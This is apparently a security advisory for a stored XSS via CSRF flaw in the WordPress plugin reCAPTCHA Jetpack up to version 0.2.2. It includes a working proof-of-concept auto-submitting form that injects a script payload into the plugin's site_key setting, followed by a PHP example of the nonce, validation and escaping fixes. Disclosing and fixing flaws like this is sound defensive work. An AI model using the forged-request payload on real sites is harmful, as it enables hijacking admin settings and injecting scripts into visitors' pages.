
reCAPTCHA Jetpack <= 0.2.2 - Stored XSS via CSRF

๐Ÿ—“๏ธย 19 Apr 2024ย 00:00:00Reported byย Bob MatyasTypeย 
wpexploit
ย wpexploit
๐Ÿ‘ย 79ย Views

This requires Jetpack to be installed and to have a page/post with a Jetpack Contact Form.

Add a post/page containing a Jetpack Contact Form shortcode:

```
[contact-form][contact-field label="Name" type="name" required="true" /][contact-field label="Email" type="email" required="true" /][contact-field label="Message" type="textarea" /][/contact-form]
```

Once there is a form using Jetpack, make a logged-in admin open an HTML document containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=recaptcha-jetpack" method="post">
        <input type="hidden" name="site_key" value='"><script>alert(4)</script>' />
        <input type="hidden" name="secret_key" value='csrf2222' />
        <input type="hidden" name="recaptcha_type" value="v2" />
        <input type="hidden" name="submit" value="Save Changes" />
        <input type="submit" name="enter" id="enter" value="Submit">
    </form>
</body>
```

View the post/page containing the form and see the XSS.
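For contrast, here is the pattern that closes both halves of this bug in a WordPress settings handler. This is an added example, not code from the reCAPTCHA Jetpack plugin; the function names, the `admin_post_rcj_save_settings` action, the nonce name `rcj_settings_nonce` and the option name `rcj_site_key` are all assumed. The forged POST above works because nothing ties the request to the admin's session, and the stored `site_key` is later written into the page unescaped.

```php
<?php
// Added example (not the plugin's own code). Hypothetical names:
// rcj_save_settings, rcj_settings_nonce, rcj_site_key.

add_action( 'admin_post_rcj_save_settings', 'rcj_save_settings' );

function rcj_save_settings() {
    // 1. Capability check: only users who may manage options can save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // 2. CSRF check: the POST must carry a nonce issued to this user's session.
    //    A form hosted on another origin cannot read that nonce, so the
    //    cross-site submission shown in the PoC is rejected here.
    check_admin_referer( 'rcj_save_settings', 'rcj_settings_nonce' );

    // 3. Input validation: strip tags, then allow only the characters a
    //    reCAPTCHA key uses ([A-Za-z0-9_-]; exact length is assumed, not checked).
    $site_key = isset( $_POST['site_key'] ) ? sanitize_text_field( wp_unslash( $_POST['site_key'] ) ) : '';
    if ( ! preg_match( '/^[A-Za-z0-9_-]{0,100}$/', $site_key ) ) {
        wp_die( 'Invalid site key.', '', array( 'response' => 400 ) );
    }
    update_option( 'rcj_site_key', $site_key );

    wp_safe_redirect( admin_url( 'options-general.php?page=recaptcha-jetpack&updated=1' ) );
    exit;
}

// Settings form: the nonce field emitted here is what the handler verifies.
function rcj_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="rcj_save_settings" />
        <?php wp_nonce_field( 'rcj_save_settings', 'rcj_settings_nonce' ); ?>
        <input type="text" name="site_key" value="<?php echo esc_attr( get_option( 'rcj_site_key', '' ) ); ?>" />
        <?php submit_button( 'Save Changes' ); ?>
    </form>
    <?php
}

// 4. Output escaping on the public page: even if a bad value were ever stored,
//    esc_attr() encodes " and > so the value cannot break out of the attribute.
function rcj_render_widget() {
    $site_key = get_option( 'rcj_site_key', '' );
    return '<div class="g-recaptcha" data-sitekey="' . esc_attr( $site_key ) . '"></div>';
}
```

Any one of the nonce check, the input validation or the output escaping would have stopped the payload in the PoC; a plugin should have all three, since each covers a different failure.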

Vulners AI Score: 5.9 (Medium risk). EPSS: 0.0004.